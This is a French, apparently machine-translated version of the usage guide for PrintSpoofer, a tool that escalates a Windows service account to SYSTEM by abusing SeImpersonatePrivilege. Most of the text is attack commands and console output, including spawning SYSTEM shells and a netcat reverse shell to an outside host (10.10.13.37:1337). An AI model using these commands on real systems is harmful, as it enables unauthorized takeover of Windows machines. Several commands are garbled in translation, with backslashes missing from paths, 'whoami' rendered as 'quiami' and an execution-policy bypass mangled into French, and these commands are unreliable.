Du SERVICE LOCAL/RÉSEAU au SYSTÈME en abusant de SeImpersonatePrivilege
sur Windows 10 et Server 2016/2019.
Vous pouvez consulter le message d'aide en utilisant l'option -h
.
C:OUTILS>PrintSpoofer.exe -h PrintSpoofer v0.1 (par @itm4n) À condition que l'utilisateur actuel dispose du privilège SeImpersonate, cet outil exploitera le privilège d'impression. Service Spooler pour obtenir un jeton SYSTEM, puis exécuter une commande personnalisée avec CreateProcessAsUser() Arguments : -cExécuter la commande *CMD* -i Interagir avec le nouveau processus dans l'invite de commande actuelle (la valeur par défaut est non interactive) -d Génère un nouveau processus sur le bureau correspondant à cette session *ID* (vérifiez votre identifiant avec qwinsta) -h C'est moi :) Exemples : - Exécutez PowerShell en tant que SYSTEM dans la console actuelle PrintSpoofer.exe -i -c powershell.exe - Générer une invite de commande SYSTEM sur le bureau de la session 1 PrintSpoofer.exe -d 1 -c cmd.exe - Obtenez une coque inversée SYSTEM PrintSpoofer.exe -c "c:Tempnc.exe 10.10.13.37 1337 -e cmd"
Si vous disposez d'un shell interactif , vous pouvez créer un nouveau processus SYSTEM dans votre console actuelle.
Cas d'utilisation : bind shell, reverse shell, psexec.py
, etc.
C:OUTILS>PrintSpoofer.exe -i -c cmd [+] Privilège trouvé : SeImpersonatePrivilege [+] Écoute de canal nommé... [+] CreateProcessAsUser() OK Microsoft Windows [Version 10.0.19613.1000] (c) 2020 Microsoft Corporation. Tous droits réservés. C:WINDOWSsystem32>quiami système d'autorité nt
Si vous pouvez exécuter des commandes mais que vous ne disposez pas d'un shell interactif, vous pouvez créer un nouveau processus SYSTEM et quitter immédiatement sans interagir avec lui.
Cas d'utilisation : WinRM, WebShell, wmiexec.py
, smbexec.py
, etc.
Créez un shell inversé :
C:TOOLS>PrintSpoofer.exe -c "C:TOOLSnc.exe 10.10.13.37 1337 -e cmd" [+] Privilège trouvé : SeImpersonatePrivilege [+] Écoute de canal nommé... [+] CreateProcessAsUser() OK
Écouteur Netcat :
C:OUTILS>nc.exe -l -p 1337 Microsoft Windows [Version 10.0.19613.1000] (c) 2020 Microsoft Corporation. Tous droits réservés. C:WINDOWSsystem32>quiami système d'autorité nt
Si vous êtes connecté localement ou via RDP (y compris VDI), vous pouvez générer une invite de commande SYSTEM sur votre bureau. Tout d'abord, vérifiez votre identifiant de session avec la commande qwinsta
puis spécifiez cette valeur avec l'option -d
.
Cas d'usage : Session Terminal (RDP), VDI
C:OUTILS>qwinsta NOM DE SESSION NOM D'UTILISATEUR ID ÉTAT TYPE PÉRIPHÉRIQUE services 0 Disque console Administrateur 1 Actif >rdp-tcp#3 utilisateur-laboratoire 3 Actif rdp-tcp 65536 Écouter C:TOOLS>PrintSpoofer.exe -d 3 -c "contournement powershell -ep" [+] Privilège trouvé : SeImpersonatePrivilege [+] Écoute de canal nommé... [+] CreateProcessAsUser() OK